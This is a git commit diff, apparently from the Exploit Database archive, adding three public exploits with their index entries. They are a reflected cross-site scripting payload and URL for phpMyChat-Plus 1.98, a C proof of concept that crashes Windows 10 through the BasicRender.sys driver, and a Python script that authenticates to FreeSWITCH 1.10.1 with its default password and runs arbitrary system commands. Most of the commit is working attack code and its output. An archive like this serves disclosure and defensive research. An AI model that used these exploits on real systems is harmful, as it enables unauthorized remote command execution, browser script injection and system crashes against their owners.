DB: 2019-12-21
4 changes to exploits/shellcodes Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC) FreeSWITCH 1.10.1 - Command Execution phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
This commit is contained in:
parent
012657c6b9
commit
e3e102da5b
5 changed files with 188 additions and 1 deletions
|
@ -7,7 +7,7 @@
|
||||||
# Hardware Version: T1
|
# Hardware Version: T1
|
||||||
# Firmware Version: 20.07
|
# Firmware Version: 20.07
|
||||||
# Tested on: Windows 10 and Kali linux
|
# Tested on: Windows 10 and Kali linux
|
||||||
# CVE: N/A
|
# CVE: CVE-2019-19742
|
||||||
|
|
||||||
Reproduction Steps:
|
Reproduction Steps:
|
||||||
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
|
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
|
||||||
|
|
17
exploits/php/webapps/47798.txt
Normal file
17
exploits/php/webapps/47798.txt
Normal file
|
@ -0,0 +1,17 @@
|
||||||
|
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
|
||||||
|
# Date: 2019-12-19
|
||||||
|
# Exploit Author: Chris Inzinga
|
||||||
|
# Vendor Homepage: http://ciprianmp.com/latest/
|
||||||
|
# Download: https://sourceforge.net/projects/phpmychat/
|
||||||
|
# Tested On: Linux & Mac
|
||||||
|
# Version: 1.98
|
||||||
|
# CVE: CVE-2019-19908
|
||||||
|
|
||||||
|
Description:
|
||||||
|
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS
|
||||||
|
|
||||||
|
Payload:
|
||||||
|
"><script>alert('xss')</script>
|
||||||
|
|
||||||
|
Vulnerable URL:
|
||||||
|
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>
|
115
exploits/windows/dos/47797.c
Normal file
115
exploits/windows/dos/47797.c
Normal file
|
@ -0,0 +1,115 @@
|
||||||
|
# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
|
||||||
|
# Date: 2019-12-20
|
||||||
|
# Exploit author: vportal
|
||||||
|
# Vendor homepage: http://www.microsoft.com
|
||||||
|
# Version: Windows 10 1803 x86
|
||||||
|
# Tested on: Windows 10 1803 x86
|
||||||
|
# CVE: N/A
|
||||||
|
|
||||||
|
# A Null pointer deference exists in the WARPGPUCMDSYNC function of the
|
||||||
|
# BasicRender.sys driver. An unprivileged user can trigger the vulnerability
|
||||||
|
# to crash the system and deny the service to the rest of the users.
|
||||||
|
|
||||||
|
*PoC:*
|
||||||
|
|
||||||
|
#include <Windows.h>
|
||||||
|
#include <d3dkmthk.h>
|
||||||
|
|
||||||
|
D3DKMT_CREATEDEVICE* device = NULL;
|
||||||
|
device = new D3DKMT_CREATEDEVICE();
|
||||||
|
|
||||||
|
D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
|
||||||
|
D3DKMTEnumAdapters(&enumAdapter);
|
||||||
|
device->hAdapter = enumAdapter.Adapters[1].hAdapter;
|
||||||
|
logger(log_counter, "EnumAdapter");
|
||||||
|
|
||||||
|
D3DKMTCreateDevice(device);
|
||||||
|
|
||||||
|
D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
|
||||||
|
contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
|
||||||
|
memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
|
||||||
|
|
||||||
|
contextVirtual->hDevice = device->hDevice;
|
||||||
|
|
||||||
|
char data[0x200] = { 0 };
|
||||||
|
memset(data, 0xff, 0x200);
|
||||||
|
|
||||||
|
contextVirtual->PrivateDriverDataSize = 0x200;
|
||||||
|
contextVirtual->pPrivateDriverData = data;
|
||||||
|
|
||||||
|
contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
|
||||||
|
contextVirtual->Flags.InitialData = 0x000001;
|
||||||
|
contextVirtual->Flags.NullRendering = 0x0;
|
||||||
|
|
||||||
|
D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
|
||||||
|
submitCommand = new D3DKMT_SUBMITCOMMAND();
|
||||||
|
|
||||||
|
submitCommand->BroadcastContext[0] = 0x40000240;
|
||||||
|
|
||||||
|
for (int i = 0; i < 0x10; i++)
|
||||||
|
submitCommand->WrittenPrimaries[i] = 0x0;
|
||||||
|
|
||||||
|
submitCommand->PresentHistoryToken = 0x100;
|
||||||
|
submitCommand->Commands = 0x004b39;
|
||||||
|
submitCommand->CommandLength = 0x00000d;
|
||||||
|
submitCommand->BroadcastContext[0] = contextVirtual->hContext;
|
||||||
|
submitCommand->BroadcastContextCount = 0x1;
|
||||||
|
submitCommand->Flags.PresentRedirected = 0x1;
|
||||||
|
|
||||||
|
submitCommand->PrivateDriverDataSize = 0x130;
|
||||||
|
|
||||||
|
char* PrivateData = NULL;
|
||||||
|
PrivateData = new char[submitCommand->PrivateDriverDataSize];
|
||||||
|
memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
|
||||||
|
|
||||||
|
*(DWORD*)(PrivateData + 0x118) = 0x434e5953;
|
||||||
|
*(DWORD*)(PrivateData + 0x11c) = 0x18;
|
||||||
|
*(DWORD*)(PrivateData + 0x120) = 0x000110;
|
||||||
|
*(DWORD*)(PrivateData + 0x124) = 0x000420;
|
||||||
|
*(DWORD*)(PrivateData + 0x128) = 0x0;
|
||||||
|
*(DWORD*)(PrivateData + 0x12c) = 0x000428;
|
||||||
|
|
||||||
|
submitCommand->pPrivateDriverData = PrivateData;
|
||||||
|
|
||||||
|
D3DKMTSubmitCommand(submitCommand);
|
||||||
|
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------
|
||||||
|
*Crash dump*:
|
||||||
|
|
||||||
|
STACK_TEXT:
|
||||||
|
8afae92c 8fe82cb2 8afae958 fffffffd 0000048c
|
||||||
|
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
|
||||||
|
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0
|
||||||
|
BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
|
||||||
|
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000
|
||||||
|
BasicRender!WarpKMSubmitCommandVirtual+0x87
|
||||||
|
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6
|
||||||
|
dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
|
||||||
|
8afaea08 92b19db6 90114c30 8afaea68 b78da008
|
||||||
|
dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
|
||||||
|
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860
|
||||||
|
dxgmms2!VidSchiSendToExecutionQueue+0x526
|
||||||
|
8afaeb90 92b764a9 00000000 945f5a80 00000000
|
||||||
|
dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
|
||||||
|
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000
|
||||||
|
dxgmms2!VidSchiWorkerThread+0x1a1
|
||||||
|
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
|
||||||
|
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15
|
||||||
|
|
||||||
|
eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000
|
||||||
|
edi=bb26afd8
|
||||||
|
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe
|
||||||
|
nc
|
||||||
|
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
|
||||||
|
efl=00010246
|
||||||
|
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
|
||||||
|
8fe8386c c7061060e88f mov dword ptr [esi],offset
|
||||||
|
BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=????????
|
||||||
|
Resetting default scope
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
The vulnerability has only been tested in Windows 10 x86 1803.
|
||||||
|
CVSS Base Score: 5.5
|
||||||
|
Credit: Victor Portal
|
52
exploits/windows/remote/47799.txt
Normal file
52
exploits/windows/remote/47799.txt
Normal file
|
@ -0,0 +1,52 @@
|
||||||
|
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
|
||||||
|
# Date: 2019-12-19
|
||||||
|
# Exploit Author: 1F98D
|
||||||
|
# Vendor Homepage: https://freeswitch.com/
|
||||||
|
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
|
||||||
|
# Version: 1.10.1
|
||||||
|
# Tested on: Windows 10 (x64)
|
||||||
|
#
|
||||||
|
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
|
||||||
|
# it after authenticating. By default commands are not accepted from remote hosts.
|
||||||
|
#
|
||||||
|
# -- Example --
|
||||||
|
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
|
||||||
|
# Authenticated
|
||||||
|
# Content-Type: api/response
|
||||||
|
# Content-Length: 20
|
||||||
|
#
|
||||||
|
# nt authority\system
|
||||||
|
#
|
||||||
|
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
from socket import *
|
||||||
|
import sys
|
||||||
|
|
||||||
|
if len(sys.argv) != 3:
|
||||||
|
print('Missing arguments')
|
||||||
|
print('Usage: freeswitch-exploit.py <target> <cmd>')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
ADDRESS=sys.argv[1]
|
||||||
|
CMD=sys.argv[2]
|
||||||
|
PASSWORD='ClueCon' # default password for FreeSWITCH
|
||||||
|
|
||||||
|
s=socket(AF_INET, SOCK_STREAM)
|
||||||
|
s.connect((ADDRESS, 8021))
|
||||||
|
|
||||||
|
response = s.recv(1024)
|
||||||
|
if b'auth/request' in response:
|
||||||
|
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
|
||||||
|
response = s.recv(1024)
|
||||||
|
if b'+OK accepted' in response:
|
||||||
|
print('Authenticated')
|
||||||
|
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
|
||||||
|
response = s.recv(8096).decode()
|
||||||
|
print(response)
|
||||||
|
else:
|
||||||
|
print('Authentication failed')
|
||||||
|
sys.exit(1)
|
||||||
|
else:
|
||||||
|
print('Not prompted for authentication, likely not vulnerable')
|
||||||
|
sys.exit(1)
|
|
@ -6625,6 +6625,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
|
47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
|
||||||
47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
|
47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
|
||||||
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
|
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
|
||||||
|
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -17868,6 +17869,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
|
47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
|
||||||
47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
|
47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
|
||||||
47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
|
47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
|
||||||
|
47799,exploits/windows/remote/47799.txt,"FreeSWITCH 1.10.1 - Command Execution",2019-12-20,1F98D,remote,windows,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -42103,3 +42105,4 @@ id,file,description,date,author,type,platform,port
|
||||||
47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
|
47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp,
|
||||||
47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
|
47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
|
||||||
47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
|
47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
|
||||||
|
47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue